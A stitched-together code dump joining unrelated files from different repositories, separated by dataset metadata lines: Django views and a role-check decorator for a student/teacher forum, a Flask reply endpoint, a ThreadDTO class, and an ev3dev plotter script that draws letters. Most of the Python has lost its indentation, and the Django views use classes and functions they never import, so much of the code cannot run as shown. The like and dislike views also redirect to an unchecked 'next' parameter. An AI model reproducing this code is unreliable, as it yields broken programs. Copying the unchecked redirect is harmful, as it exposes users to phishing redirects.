from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.db.models import Count
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from users.decorators import allowed_users
decorators = [allowed_users(allowed_roles=['student', 'teacher']), login_required ]
def is_users(post_user, logged_user):
return post_user == logged_user
PAGINATION_COUNT = 10
def welcome(request):
if request.user.is_authenticated:
return redirect('blog-home')
return render(request,'blog/welcome.html')
def privacy_policy(request):
return render(request,'blog/privacy_policy.html')
def cookies(request):
return render(request,'blog/cookies.html')
@method_decorator(decorators, name='dispatch')
class PostListView(LoginRequiredMixin, ListView):
model = Post
template_name = 'blog/home.html'
context_object_name = 'posts'
ordering = ['-date_posted']
paginate_by = PAGINATION_COUNT
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
all_users = []
data_counter = Post.objects.values('author').annotate(author_count=Count('author')).order_by('-author_count')[:6]
for aux in data_counter:
all_users.append(User.objects.filter(pk=aux['author']).first())
context['all_users'] = all_users
return context
def get_queryset(self):
user = self.request.user
queryset = Follow.objects.filter(user=user)
follows = [user]
for obj in queryset:
follows.append(obj.follow_user)
return Post.objects.filter(author__in=follows).order_by('-date_posted')
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class UserPostListView(LoginRequiredMixin, ListView):
model = Post
template_name = 'blog/user_posts.html'
context_object_name = 'posts'
paginate_by = PAGINATION_COUNT
def visible_user(self):
return get_object_or_404(User, username=self.kwargs.get('username'))
def get_context_data(self, **kwargs):
visible_user = self.visible_user()
logged_user = self.request.user
if logged_user.username == '' or logged_user is None:
can_follow = False
else:
can_follow = (Follow.objects.filter(user=logged_user, follow_user=visible_user).count() == 0)
context = super().get_context_data(**kwargs)
context['user_profile'] = visible_user
context['can_follow'] = can_follow
return context
def get_queryset(self):
user = self.visible_user()
return Post.objects.filter(author=user).order_by('-date_posted')
def post(self, request, *args, **kwargs):
if request.user.id is not None:
profile = self.visible_user()
follows_between = Follow.objects.filter(user=request.user, follow_user=self.visible_user())
if 'follow' in request.POST:
new_relation = Follow(user=request.user, follow_user=self.visible_user())
if follows_between.count() == 0:
new_relation.save()
notification = Notification.objects.create(notification_type=3, from_user=request.user, to_user=self.visible_user())
elif 'unfollow' in request.POST:
if follows_between.count() > 0:
follows_between.delete()
return self.get(self, request, *args, **kwargs)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class PostDetailView(LoginRequiredMixin, DetailView):
model = Post
template_name = 'blog/post_detail.html'
context_object_name = 'post'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
comments_connected = Comment.objects.filter(post_connected=self.get_object()).order_by('-date_posted')
context['comments'] = comments_connected
context['form'] = NewCommentForm(instance=self.request.user)
return context
def post(self, request, pk, *args, **kwargs):
post = Post.objects.get(pk=pk)
new_comment = Comment(content=request.POST.get('content'),
attachedurl=request.POST.get('attachedurl'),
author=self.request.user,
post_connected=self.get_object())
new_comment.save()
notification = Notification.objects.create(notification_type=2, from_user=request.user, to_user=post.author, post=post)
messages.success(request, 'Comment successfully submitted')
return self.get(self, request, *args, **kwargs)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Post
template_name = 'blog/post_delete.html'
context_object_name = 'post'
success_url = '/'
def test_func(self):
return is_users(self.get_object().author, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class PostCreateView(LoginRequiredMixin, CreateView):
model = Post
fields = ['content', 'attachedurl', 'attachedimage']
template_name = 'blog/post_new.html'
success_url = '/'
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add new post'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Post
fields = ['content', 'attachedurl', 'attachedimage']
template_name = 'blog/post_new.html'
success_url = '/'
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().author, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit post'
return context
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class FollowsListView(ListView):
model = Follow
template_name = 'blog/follow.html'
context_object_name = 'follows'
def visible_user(self):
return get_object_or_404(User, username=self.kwargs.get('username'))
def get_queryset(self):
user = self.visible_user()
return Follow.objects.filter(user=user).order_by('-date')
def get_context_data(self, *, object_list=None, **kwargs):
context = super().get_context_data(**kwargs)
context['follow'] = 'follows'
return context
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class FollowersListView(ListView):
model = Follow
template_name = 'blog/follow.html'
context_object_name = 'follows'
def visible_user(self):
return get_object_or_404(User, username=self.kwargs.get('username'))
def get_queryset(self):
user = self.visible_user()
return Follow.objects.filter(follow_user=user).order_by('-date')
def get_context_data(self, *, object_list=None, **kwargs):
context = super().get_context_data(**kwargs)
context['follow'] = 'followers'
return context
# ==================================Post Like Functionality=============================
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class AddLike(LoginRequiredMixin, View):
def post(self, request, pk, *args, **kwargs):
post = Post.objects.get(pk=pk)
if post.dislikes.filter(id=request.user.id).exists():
post.dislikes.remove(request.user)
if not post.likes.filter(id=request.user.id).exists():
post.likes.add(request.user)
notification = Notification.objects.create(notification_type=1, from_user=request.user, to_user=post.author, post=post)
else:
post.likes.remove(request.user)
next = request.POST.get('next', '/')
return HttpResponseRedirect(next)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class AddDislike(LoginRequiredMixin, View):
def post(self, request, pk, *args, **kwargs):
post = Post.objects.get(pk=pk)
if post.likes.filter(id=request.user.id).exists():
post.likes.remove(request.user)
if not post.dislikes.filter(id=request.user.id).exists():
post.dislikes.add(request.user)
else:
post.dislikes.remove(request.user)
next = request.POST.get('next', '/')
return HttpResponseRedirect(next)
# ===============================Comment Like Functionality=============================
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class AddCommentLike(LoginRequiredMixin, View):
def post(self, request, pk, *args, **kwargs):
comment = Comment.objects.get(pk=pk)
if comment.dislikes.filter(id=request.user.id).exists():
comment.dislikes.remove(request.user)
if not comment.likes.filter(id=request.user.id).exists():
comment.likes.add(request.user)
notification = Notification.objects.create(notification_type=1, from_user=request.user, to_user=comment.author, comment=comment)
else:
comment.likes.remove(request.user)
next = request.POST.get('next', 'post-detail')
return HttpResponseRedirect(next)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class AddCommentDislike(LoginRequiredMixin, View):
def post(self, request, pk, *args, **kwargs):
comment = Comment.objects.get(pk=pk)
if comment.likes.filter(id=request.user.id).exists():
comment.likes.remove(request.user)
if not comment.dislikes.filter(id=request.user.id).exists():
comment.dislikes.add(request.user)
else:
comment.dislikes.remove(request.user)
next = request.POST.get('next', 'post-detail')
return HttpResponseRedirect(next)
def about(request):
return render(request,'blog/about.html',)
```
#### File: icp-forum/users/decorators.py
```python
from django.contrib.auth.models import AnonymousUser
from django.http import HttpResponse
from django.shortcuts import redirect
from django.contrib import messages
from users.models import User
def unauthenticated_user(view_func):
def wrapper_func(request, *args, **kwargs):
if request.user.is_authenticated:
return redirect('blog-home')
else:
return view_func(request, *args, **kwargs)
return wrapper_func
def allowed_users(allowed_roles=[]):
def decorator(view_func):
def wrapper_func(request, *args, **kwargs):
group = None
user = request.user
if request.user.groups.exists():
group= request.user.groups.all()[0].name
if group in allowed_roles:
return view_func(request, *args, **kwargs)
elif(user in User.objects.all()):
messages.success(request, f'Your account has been created for {user}. Follow the verifications process.')
return redirect('logout')
elif(user == AnonymousUser()):
return redirect('login')
else:
print(type(user))
print(user)
return HttpResponse("You're not authorised to enter the platform.")
return wrapper_func
return decorator
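# Illustrative usage (hedged; mirrors how the views in this project apply the decorator):
#   @allowed_users(allowed_roles=["teacher"])
#   def my_view(request):
#       ...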
```
#### File: icp-forum/users/views.py
```python
from django.shortcuts import render, HttpResponse
from .forms import CertificateForm, EducationForm, ProjectForm, SemesterForm, UserRegisterForm, ProfileUpdateForm
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from .decorators import unauthenticated_user, allowed_users
from django.views.generic import CreateView, UpdateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.utils.decorators import method_decorator
from blog.views import is_users
from .models import Education, Certification, Profile, Project, Semester
from django.contrib.auth import get_user_model
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.contrib.sites.shortcuts import get_current_site
from .tokens import account_activation_token
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes, force_text
from django_project.settings import EMAIL_HOST_USER
@login_required
def resume(request, username, **kwargs):
if request.method == 'GET':
visible_user = User.objects.get(username=username)
userdetail = User.objects.get(username=visible_user)
profiledetail = Profile.objects.get(user=visible_user)
educationdetail = Education.objects.filter(holder=visible_user).order_by('-startYear')
certificatedetail = Certification.objects.filter(holder=visible_user).order_by('-issueDate')
projectdetail = Project.objects.filter(owner=visible_user).order_by('-startDate')
semesterdetail = Semester.objects.filter(owner=visible_user).order_by('-semester')
return render(request,'users/resume.html', {'userdetail': userdetail, 'profiledetail': profiledetail, 'educationdetail':educationdetail, 'certificatedetail':certificatedetail, 'projectdetail': projectdetail, 'semesterdetail': semesterdetail})
@login_required
def result(request, username, **kwargs):
if request.method == 'GET':
visible_user = User.objects.get(username=username)
semesterdetail = Semester.objects.filter(owner=visible_user)
return render(request,'users/sem-result.html', {'semesterdetail': semesterdetail})
@unauthenticated_user
def register(request):
User = get_user_model()
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.is_active = False
user.save()
current_site = get_current_site(request)
mail_subject = 'Activate your account.'
message = render_to_string('users/acc_active_email.html', {
'user': user,
'domain': current_site.domain,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': account_activation_token.make_token(user),
})
to_email = form.cleaned_data.get('email')
send_mail(mail_subject, message, EMAIL_HOST_USER, [to_email])
username = form.cleaned_data.get('username')
messages.success(request, f'Account created for {username}, Please get verified yourself by further procedures to enter the platform.')
return HttpResponse('Please confirm your email address to complete the registration')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
def activate(request, uidb64, token):
User = get_user_model()
try:
uid = force_text(urlsafe_base64_decode(uidb64))
user = User.objects.get(pk=uid)
except(TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and account_activation_token.check_token(user, token):
user.is_active = True
user.save()
return HttpResponse('Thank you for your email confirmation. Now you can login your account.')
else:
return HttpResponse('Activation link is invalid!')
@login_required
@allowed_users(allowed_roles=['student', 'teacher'])
def profile(request):
if request.method == 'GET':
pform = Profile.objects.get(user=request.user)
eform = Education.objects.filter(holder=request.user)
cform = Certification.objects.filter(holder=request.user)
prform = Project.objects.filter(owner=request.user)
sform = Semester.objects.filter(owner=request.user)
return render(request, 'users/profile.html', {'pform': pform, 'eform': eform, 'cform': cform, 'prform': prform, 'sform': sform})
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class ProfileUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Profile
form_class = ProfileUpdateForm
template_name = 'users/add-update.html'
success_url = '/profile'
success_message = "%(username)s profile has been updated"
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().user, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit profile details'
return context
@login_required
def SearchView(request):
if request.method == 'POST':
query = request.POST.get('search')
print(query)
results = User.objects.filter(username__contains=query)
context = {
'results':results
}
return render(request, 'users/search_result.html', context)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class EducationDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Education
template_name = 'users/delete.html'
context_object_name = 'education'
success_url = '/profile'
def test_func(self):
return is_users(self.get_object().holder, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class EducationCreateView(LoginRequiredMixin, CreateView):
model = Education
form_class = EducationForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.holder = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add education'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class EducationUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Education
form_class = EducationForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.holder = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().holder, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit educational details'
return context
# Certificate view
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class CertificateDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Certification
template_name = 'users/delete.html'
context_object_name = 'certificate'
success_url = '/profile'
def test_func(self):
return is_users(self.get_object().holder, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class CertificateCreateView(LoginRequiredMixin, CreateView):
model = Certification
form_class = CertificateForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.holder = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add certificate'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class CertificateUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Certification
form_class = CertificateForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.holder = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().holder, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit certificate'
return context
# Project view
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class ProjectDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Project
template_name = 'users/delete.html'
context_object_name = 'project'
success_url = '/profile'
def test_func(self):
return is_users(self.get_object().owner, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class ProjectCreateView(LoginRequiredMixin, CreateView):
model = Project
form_class = ProjectForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.owner = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add project'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class ProjectUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Project
form_class = ProjectForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.owner = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().owner, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit project'
return context
# semester view
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class SemesterDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Semester
template_name = 'users/delete.html'
context_object_name = 'semester'
success_url = '/profile'
def test_func(self):
return is_users(self.get_object().owner, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class SemesterCreateView(LoginRequiredMixin, CreateView):
model = Semester
form_class = SemesterForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.owner = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add semester result'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class SemesterUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Semester
form_class = SemesterForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.owner = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().owner, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit semester result'
return context
``` |
{
"source": "1noro/dam2-proyecto-final",
"score": 2
} |
#### File: dam2-proyecto-final/code/post-reply.py
```python
@app.route('/<slug>/thread/<thread_id>', methods=['POST'])
def post_reply(slug, thread_id):
    formData = request.get_json()
    mydb = get_mydb()
    mycursor = mydb.cursor()
    args = (
        formData['author'],
        formData['comment'],
        formData['imageurl'],
        thread_id
    )
    mycursor.callproc('insert_post', args)
    # commit so the stored-procedure insert is persisted (MySQL connectors
    # generally do not autocommit by default)
    mydb.commit()
    mycursor.close()
    mydb.close()
    return app.response_class(
        response = '{"info": "posted"}',
        status = 201,
        mimetype = 'application/json'
    )
```
#### File: dam2-proyecto-final/code/ThreadDTO.py
```python
import json


class ThreadDTO:
    def __init__(self, id, subject, author, comment, fileurl, published, sticky, closed):
        self.id = id
        self.subject = subject
        self.author = author
        self.comment = comment
        self.fileurl = fileurl
        # store the publication datetime as a locale-formatted string
        self.published = published.strftime('%c')
        self.sticky = sticky
        self.closed = closed

    def to_JSON(self):
        # serialize every instance attribute into a JSON string
        return json.dumps(self, default=lambda o: o.__dict__)
``` |
{
"source": "1nt3rnal3rr0r/robotics",
"score": 3
} |
#### File: robotics/controller/letters.py
```python
from time import sleep
from ev3dev.ev3 import *
xMotor = LargeMotor('outC')
yMotor = LargeMotor('outB')
zMotor = MediumMotor('outA')
touchSensor = TouchSensor('in2')
whiteApproximation = 180
timeT = 1200
speed = 100
speedBackwards = -100
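# Plotter conventions used throughout this module (inferred from the code below):
# xMotor moves the pen carriage horizontally, yMotor vertically, and zMotor raises or
# lowers the pen; run_timed() takes milliseconds, so each move is followed by
# sleep(time_ms / 1000) to let it finish before the next stroke starts.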
def printA():
#pen on paper
penToPaper()
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT/1000)
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT/1000)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
yMotor.run_timed(time_sp=timeT/4, speed_sp=speed)
sleep(timeT / 4000)
yMotor.run_timed(time_sp=timeT / 4 + timeT + timeT / 4, speed_sp=speedBackwards)
sleep(timeT / 4000 + timeT/1000 + timeT / 4000)
#pen out of power
penOutOfPaper()
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
spacing()
print ("A")
def printB():
# pen on paper
penToPaper()
yMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
sleep(timeT/2000)
xMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT/2000)
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT/2000)
xMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
sleep(timeT / 2000)
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
xMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# pen out of power
penOutOfPaper()
# spacing
spacing()
print ("B")
def printC():
# pen on paper
penToPaper()
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT/1000)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("C")
def printD():
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# pen on paper
penToPaper()
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("D")
def printE():
# pen on paper
penToPaper()
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#|
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#-
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
spacing()
print ("E")
def printF():
# pen on paper
penToPaper()
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("F")
def printG():
# pen on paper
penToPaper()
#|
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#|
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#|
yMotor.run_timed(time_sp=timeT , speed_sp=speedBackwards)
sleep(timeT / 1000)
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# pen out of power
penOutOfPaper()
# spacing
spacing()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
print ("G")
def printH():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("H")
def printI():
# pen on paper
penToPaper()
# -
print("-")
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# pen out of power
print("pen out")
penOutOfPaper()
# spacing
print("spacing")
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT/1000)
    # keep the pen lifted off the paper after the letter is finished
    print("pen out")
    penOutOfPaper()
print ("I")
def newLine():
# pen out of power
print("pen out")
zMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT*14, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT*3, speed_sp=speedBackwards)
sleep(timeT / 1000*14)
def printDot():
# pen on paper
# penToPaper()
# .
print(".")
yMotor.run_timed(time_sp=timeT/12, speed_sp=speed)
sleep(timeT / 12000)
# pen out of power
print("pen out")
penOutOfPaper()
# spacing
print("spacing")
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
# pen in of power
print("pen in")
penToPaper()
print ("I")
def printJ():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("J")
def printK():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# \
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("K")
def printL():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("L")
def printM():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# \
printBackSlash()
# /
printFrontSlash()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("M")
def printN():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# \
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("N")
def printO():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("O")
def printP():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("P")
def printQ():
printO()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# \
yMotor.run_timed(time_sp=timeT / 3, speed_sp=speed)
xMotor.run_timed(time_sp=timeT / 3, speed_sp=speed)
sleep(timeT / 3000)
# spacing
spacing()
# pen out of power
penOutOfPaper()
print("Q")
def printR():
# pen on paper
penToPaper()
# |
